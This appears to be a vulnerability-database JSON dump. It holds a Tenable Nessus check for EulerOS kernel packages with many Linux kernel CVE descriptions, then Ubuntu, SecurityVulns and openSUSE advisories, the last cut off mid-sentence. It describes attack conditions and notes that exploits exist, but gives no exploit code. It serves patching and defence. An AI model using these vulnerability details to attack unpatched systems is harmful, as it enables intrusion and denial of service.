A user or process able to access the\n '/dev/kvm' device could use this flaw to crash the\n system, resulting in a denial of\n service.(CVE-2019-19332)kernel/sched/fair.c in the\n Linux kernel before 5.3.9, when cpu.cfs_quota_us is\n used (e.g., with Kubernetes), allows attackers to cause\n a denial of service against non-cpu-bound applications\n by generating a workload that triggers unwanted slice\n expiration, aka CID-de53fd7aedb1. (In other words,\n although this slice expiration would typically be seen\n with benign workloads, it is possible that an attacker\n could calculate how many stray requests are required to\n force an entire Kubernetes cluster into a\n low-performance state caused by slice expiration, and\n ensure that a DDoS attack sent that number of stray\n requests. An attack does not affect the stability of\n the kernel it only causes mismanagement of application\n execution.)(CVE-2019-19922)An exploitable\n denial-of-service vulnerability exists in the Linux\n kernel prior to mainline 5.3. An attacker could exploit\n this vulnerability by triggering AP to send IAPP\n location updates for stations before the required\n authentication process has completed. This could lead\n to different denial-of-service scenarios, either by\n causing CAM table attacks, or by leading to traffic\n flapping if faking already existing clients in other\n nearby APs of the same wireless infrastructure. An\n attacker can forge Authentication and Association\n Request packets to trigger this\n vulnerability.(CVE-2019-5108)A heap-based buffer\n overflow vulnerability was found in the Linux kernel,\n version kernel-2.6.32, in Marvell WiFi chip driver. A\n remote attacker could cause a denial of service (system\n crash) or, possibly execute arbitrary code, when the\n lbs_ibss_join_existing function is called after a STA\n connects to an AP.(CVE-2019-14896)A stack-based buffer\n overflow was found in the Linux kernel, version\n kernel-2.6.32, in Marvell WiFi chip driver. 
An attacker\n is able to cause a denial of service (system crash) or,\n possibly execute arbitrary code, when a STA works in\n IBSS mode (allows connecting stations together without\n the use of an AP) and connects to another\n STA.(CVE-2019-14897)In the Linux kernel through 5.4.6,\n there is a NULL pointer dereference in\n drivers/scsi/libsas/sas_discover.c because of\n mishandling of port disconnection during discovery,\n related to a PHY down race condition, aka\n CID-f70267f379b5.(CVE-2019-19965)In the Linux kernel\n before 5.1.6, there is a use-after-free in cpia2_exit()\n in drivers/media/usb/cpia2/cpia2_v4l.c that will cause\n denial of service, aka\n CID-dea37a972655.(CVE-2019-19966)In the Linux kernel\n before 5.1, there is a memory leak in\n __feat_register_sp() in net/dccp/feat.c, which may\n cause denial of service, aka\n CID-1d3ff0950e2b.(CVE-2019-20096)In the Linux kernel\n before 5.0.6, there is a NULL pointer dereference in\n drop_sysctl_table() in fs/proc/proc_sysctl.c, related\n to put_links, aka\n CID-23da9588037e.(CVE-2019-20054)drivers/\n net/usb/pegasus.c in the Linux kernel 4.9.x before\n 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK\n option, which allows local users to cause a denial of\n service (system crash or memory corruption) or possibly\n have unspecified other impact by leveraging use of more\n than one virtual page for a DMA\n scatterlist.(CVE-2017-8068)A heap-based buffer overflow\n was discovered in the Linux kernel, all versions 3.x.x\n and 4.x.x before 4.18.0, in Marvell WiFi chip driver.\n The flaw could occur when the station attempts a\n connection negotiation during the handling of the\n remote devices country settings. 
This could allow the\n remote device to cause a denial of service (system\n crash) or possibly execute arbitrary\n code.(CVE-2019-14895)The acpi_ds_create_operands()\n function in drivers/acpi/acpica/dsutils.c in the Linux\n kernel through 4.12.9 does not flush the operand cache\n and causes a kernel stack dump, which allows local\n users to obtain sensitive information from kernel\n memory and bypass the KASLR protection mechanism (in\n the kernel through 4.9) via a crafted ACPI\n table.(CVE-2017-13693)Linux kernel CIFS implementation,\n version 4.9.0 is vulnerable to a relative paths\n injection in directory entry lists.(CVE-2019-10220)A\n heap overflow flaw was found in the Linux kernel, all\n versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi\n chip driver. The vulnerability allows a remote attacker\n to cause a system crash, resulting in a denial of\n service, or execute arbitrary code. The highest threat\n with this vulnerability is with the availability of the\n system. If code execution occurs, the code will run\n with the permissions of root. This will affect both\n confidentiality and integrity of files on the\n system.(CVE-2019-14901)In the AppleTalk subsystem in\n the Linux kernel before 5.1, there is a potential NULL\n pointer dereference because register_snap_client may\n return NULL. 
This will lead to denial of service in\n net/appletalk/aarp.c and net/appletalk/ddp.c, as\n demonstrated by unregister_snap_client, aka\n CID-9804501fa122.(CVE-2019-19227)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/usb/class/cdc-acm.c driver, aka\n CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel\n before 5.3.9, there are multiple out-of-bounds write\n bugs that can be caused by a malicious USB device in\n the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c,\n drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c,\n drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c,\n drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)A use-after-free\n in binder.c allows an elevation of privilege from an\n application to the Linux Kernel. 
No user interaction is\n required to exploit this vulnerability, however\n exploitation does require either the installation of a\n malicious local application or a separate vulnerability\n in a network facing application.Product: AndroidAndroid\n ID: A-141720095(CVE-2019-2215)The do_remount function\n in fs/ namespace.c in the Linux kernel through 3.16.1\n does not maintain the MNT_LOCK_READONLY bit across a\n remount of a bind mount, which allows local users to\n bypass an intended read-only restriction and defeat\n certain sandbox protection mechanisms via a 'mount -o\n remount' command within a user\n namespace.(CVE-2014-5206)Multiple integer overflows in\n the lzo1x_decompress_safe function in\n lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor\n in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)The\n pivot_root implementation in fs/ namespace.c in the\n Linux kernel through 3.17 does not properly interact\n with certain locations of a chroot directory, which\n allows local users to cause a denial of service\n (mount-tree loop) via . (dot) values in both arguments\n to the pivot_root system call.(CVE-2014-7970)A security\n flaw was discovered in nl80211_set_rekey_data()\n function in the Linux kernel since v3.1-rc1 through\n v4.13. 
This function does not check whether the\n required attributes are present in a netlink request.\n This request can be issued by a user with CAP_NET_ADMIN\n privilege and may result in NULL dereference and a\n system crash.(CVE-2017-12153)arch/x86/kernel/entry_32.S\n in the Linux kernel through 3.15.1 on 32-bit x86\n platforms, when syscall auditing is enabled and the sep\n CPU feature flag is set, allows local users to cause a\n denial of service (OOPS and system crash) via an\n invalid syscall number, as demonstrated by number\n 1000.(CVE-2014-4508)fs/ namespace.c in the Linux kernel\n through 3.16.1 does not properly restrict clearing\n MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which\n allows local users to gain privileges, interfere with\n backups and auditing on systems that had atime enabled,\n or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)In the Linux kernel before\n 5.3.7, there is a use-after-free bug that can be caused\n by a malicious USB device in the\n drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)In the Linux kernel\n before 5.3.12, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/input/ff-memless.c driver, aka\n CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/hid/usbhid/hiddev.c driver, aka\n CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel\n before 5.3.7, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/iowarrior.c driver, aka\n CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel\n before 5.2.9, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/yurex.c driver, aka\n 
CID-fc05481b2fca.(CVE-2019-19531)In the Linux kernel\n before 5.3.4, there is an info-leak bug that can be\n caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel\n before 5.3.11, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_core.c driver, aka\n CID-f7a1337f0d29..(CVE-2019-19534)In the Linux kernel\n before 5.2.9, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_pro.c driver, aka\n CID-ead16e53c2f0.(CVE-2019-19536)In the Linux kernel\n before 5.2.10, there is a race condition bug that can\n be caused by a malicious USB device in the USB\n character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)A\n memory leak in the cx23888_ir_probe() function in\n drivers/media/pci/cx23885/cx23888-ir.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n kfifo_alloc() failures, aka\n CID-a7b2df76b42b.(CVE-2019-19054)A memory leak in the\n mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in\n the mwifiex_pcie_init_evt_ring() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)A memory leak in the\n adis_update_scan_mode() function in\n drivers/iio/imu/adis_buffer.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption), aka\n 
CID-ab612b1daf41.(CVE-2019-19060)A memory leak in the\n crypto_report() function in crypto/crypto_user_base.c\n in the Linux kernel through 5.3.11 allows attackers to\n cause a denial of service (memory consumption) by\n triggering crypto_report_alg() failures, aka\n CID-ffdde5932042.(CVE-2019-19062)Two memory leaks in\n the rtl_usb_probe() function in drivers/\n net/wireless/realtek/rtlwifi/usb.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)A memory leak in the\n bfad_im_get_stats() function in\n drivers/scsi/bfa/bfad_attr.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n bfa_port_get_stats() failures, aka\n CID-0e62395da2bd.(CVE-2019-19066)Memory leaks in\n drivers/ net/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)A memory leak in the\n ath9k_wmi_cmd() function in drivers/\n net/wireless/ath/ath9k/wmi.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)An issue was\n discovered in fs/xfs/xfs_icache.c in the Linux kernel\n through 4.17.3. There is a NULL pointer dereference and\n panic in lookup_slow() on a NULL inode->i_ops pointer\n when doing pathwalks on a corrupted xfs image. This\n occurs because of a lack of proper validation that\n cached inodes are free during\n allocation.(CVE-2018-13093)An issue was discovered in\n slc_bump in drivers/ net/can/slcan.c in the Linux\n kernel through 5.6.2. 
It allows attackers to read\n uninitialized can_frame data, potentially containing\n sensitive information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)An issue was\n discovered in the Linux kernel through 5.6.2.\n mpol_parse_str in mm/mempolicy.c has a stack-based\n out-of-bounds write because an empty nodelist is\n mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)In the Linux kernel\n before 5.4.12, drivers/input/input.c has out-of-bounds\n writes via a crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)An issue was\n discovered in the Linux kernel before 5.6.1.\n drivers/media/usb/gspca/ov519.c allows NULL pointer\n dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)An issue was\n discovered in the stv06xx subsystem in the Linux kernel\n before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c\n and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)In the Linux kernel\n before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c\n (aka the Xirlink camera USB driver) mishandles invalid\n descriptors, aka CID-a246b4d54770.(CVE-2020-11668)A\n flaw was found in the Linux kernel's implementation of\n GRO. 
This flaw allows an attacker with local access to\n crash the\n system.(CVE-2020-10720)gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)An issue was\n discovered in the Linux kernel through 5.6.11. sg_write\n lacks an sg_remove_request call in a certain failure\n case, aka CID-83c6f2390040.(CVE-2020-12770)A signal\n access-control issue was discovered in the Linux kernel\n before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in\n include/linux/sched.h is only 32 bits, an integer\n overflow can interfere with a do_notify_parent\n protection mechanism. A child process can send an\n arbitrary signal to a parent process in a different\n security domain. Exploitation limitations include the\n amount of elapsed time before an integer overflow\n occurs, and the lack of scenarios where signals to a\n parent process present a substantial operational\n threat.(CVE-2020-12826)The fix for CVE-2019-11599,\n affecting the Linux kernel before 5.0.10 was not\n complete. A local user could use this flaw to obtain\n sensitive information, cause a denial of service, or\n possibly have other unspecified impacts by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-14898)usb_sg_cancel in\n drivers/usb/core/message.c in the Linux kernel before\n 5.6.8 has a use-after-free because a transfer occurs\n without a reference, aka\n CID-056ad39ee925.(CVE-2020-12464)The __mptctl_ioctl\n function in drivers/message/fusion/mptctl.c in the\n Linux kernel before 5.4.14 allows local users to hold\n an incorrect lock during the ioctl operation and\n trigger a race condition, i.e., a 'double fetch'\n vulnerability, aka CID-28d76df18f0a. 
NOTE: the vendor\n states 'The security impact of this bug is not as bad\n as it could have been because these operations are all\n privileged and root already has enormous destructive\n power.'(CVE-2020-12652)An issue was found in Linux\n kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv()\n function in drivers/\n net/wireless/marvell/mwifiex/scan.c allows local users\n to gain privileges or cause a denial of service because\n of an incorrect memcpy and buffer overflow, aka\n CID-b70261a288ea.(CVE-2020-12653)An issue was found in\n Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status()\n in drivers/ net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)An issue was\n discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35c58a13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.62.59.83.h230\",\n \"kernel-debug-3.10.0-327.62.59.83.h230\",\n \"kernel-debug-devel-3.10.0-327.62.59.83.h230\",\n \"kernel-debuginfo-3.10.0-327.62.59.83.h230\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.62.59.83.h230\",\n \"kernel-devel-3.10.0-327.62.59.83.h230\",\n \"kernel-headers-3.10.0-327.62.59.83.h230\",\n \"kernel-tools-3.10.0-327.62.59.83.h230\",\n \"kernel-tools-libs-3.10.0-327.62.59.83.h230\",\n \"perf-3.10.0-327.62.59.83.h230\",\n \"python-perf-3.10.0-327.62.59.83.h230\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2318-1\r\nAugust 18, 2014\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nEric W. Biederman discovered a flaw with the mediation of mount flags in\r\nthe Linux kernel's user namespace subsystem. 
An unprivileged user could\r\nexploit this flaw to by-pass mount restrictions, and potentially gain\r\nadministrative privileges. (CVE-2014-5207)\r\n\r\nKenton Varda discovered a flaw with read-only bind mounts when used with\r\nuser namespaces. An unprivileged local user could exploit this flaw to gain\r\nfull write privileges to a mount that should be read only. (CVE-2014-5206)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n linux-image-3.13.0-34-generic 3.13.0-34.60\r\n linux-image-3.13.0-34-generic-lpae 3.13.0-34.60\r\n linux-image-3.13.0-34-lowlatency 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc-e500 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc-e500mc 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc-smp 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc64-emb 3.13.0-34.60\r\n linux-image-3.13.0-34-powerpc64-smp 3.13.0-34.60\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. 
linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2318-1\r\n CVE-2014-5206, CVE-2014-5207\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.13.0-34.60\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "SECURITYVULNS:DOC:31007", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31007", "title": "[USN-2318-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-4699", "CVE-2014-5206", "CVE-2014-5207"], "description": "DoS via ptrace syscall, filesystems mount options limitation bypass.", "edition": 1, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "SECURITYVULNS:VULN:13914", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13914", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:38:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-3182", "CVE-2013-2898", "CVE-2014-3186", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-9090", "CVE-2014-3688", "CVE-2014-7841", "CVE-2013-2891", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-9322", "CVE-2014-0206", "CVE-2014-3181", "CVE-2014-8709", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-4715", "CVE-2014-8884", "CVE-2014-4608", "CVE-2014-4611", "CVE-2013-7263", 
"CVE-2014-0181", "CVE-2014-5207", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-8133", "CVE-2014-7826", "CVE-2014-3184", "CVE-2014-3687"], "description": "The openSUSE 13.1 kernel was updated to fix security issues and bugs:\n\n Security issues fixed: CVE-2014-9322: A local privilege escalation in the\n x86_64 32bit compatibility signal handling was fixed, which could be used\n by local attackers to crash the machine or execute code.\n\n CVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c in\n the Linux kernel did not properly handle faults associated with the Stack\n Segment (SS) segment register, which allowed local users to cause a denial\n of service (panic) via a modify_ldt system call, as demonstrated by\n sigreturn_32 in the linux-clock-tests test suite.\n\n CVE-2014-8133: Insufficient validation of TLS register usage could leak\n information from the kernel stack to userspace.\n\n CVE-2014-0181: The Netlink implementation in the Linux kernel through\n 3.14.1 did not provide a mechanism for authorizing socket operations based\n on the opener of a socket, which allowed local users to bypass intended\n access restrictions and modify network configurations by using a Netlink\n socket for the (1) stdout or (2) stderr of a setuid program. 
(bsc#875051)\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-3688: The SCTP implementation in the Linux kernel allowed remote\n attackers to cause a denial of service (memory consumption) by triggering\n a large number of chunks in an association's output queue, as demonstrated\n by ASCONF probes, related to net/sctp/inqueue.c and\n net/sctp/sm_statefuns.c.\n\n CVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\n net/sctp/associola.c in the SCTP implementation in the Linux kernel\n allowed remote attackers to cause a denial of service (panic) via\n duplicate ASCONF chunks that trigger an incorrect uncork within the\n side-effect interpreter.\n\n CVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\n kernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\n calls that change the root filesystem to read-only, which allowed local\n users to cause a denial of service (loss of writability) by making certain\n unshare system calls, clearing the / MNT_LOCKED flag, and making an\n MNT_FORCE umount system call.\n\n CVE-2014-8884: Stack-based buffer overflow in the\n ttusbdecfe_dvbs_diseqc_send_master_cmd function in\n drivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed local\n users to cause a denial of service (system crash) or possibly gain\n privileges via a large message length in an ioctl call.\n\n CVE-2014-3673: The SCTP implementation in the Linux kernel allowed remote\n attackers to cause a denial of service (system crash) via a malformed\n ASCONF chunk, related to net/sctp/sm_make_chunk.c and\n net/sctp/sm_statefuns.c.\n\n CVE-2014-3186: Buffer overflow in the picolcd_raw_event function in\n devices/hid/hid-picolcd_core.c in the PicoLCD HID 
device driver in the\n Linux kernel, as used in Android on Nexus 7 devices, allowed physically\n proximate attackers to cause a denial of service (system crash) or\n possibly execute arbitrary code via a crafted device that sends a large\n report.\n\n CVE-2014-7841: The sctp_process_param function in net/sctp/sm_make_chunk.c\n in the SCTP implementation in the Linux kernel, when ASCONF is used,\n allowed remote attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a malformed INIT chunk.\n\n CVE-2014-4611: Integer overflow in the LZ4 algorithm implementation, as\n used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in\n lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit\n platforms might allow context-dependent attackers to cause a denial of\n service (memory corruption) or possibly have unspecified other impact via\n a crafted Literal Run that would be improperly handled by programs not\n complying with an API limitation, a different vulnerability than\n CVE-2014-4715.\n\n CVE-2014-4608: Multiple integer overflows in the lzo1x_decompress_safe\n function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the\n Linux kernel allowed context-dependent attackers to cause a denial\n of service (memory corruption) via a crafted Literal Run.\n\n CVE-2014-8709: The ieee80211_fragment function in net/mac80211/tx.c in the\n Linux kernel did not properly maintain a certain tail pointer, which\n allowed remote attackers to obtain sensitive cleartext information by\n reading packets.\n\n CVE-2014-3185: Multiple buffer overflows in the command_port_read_callback\n function in 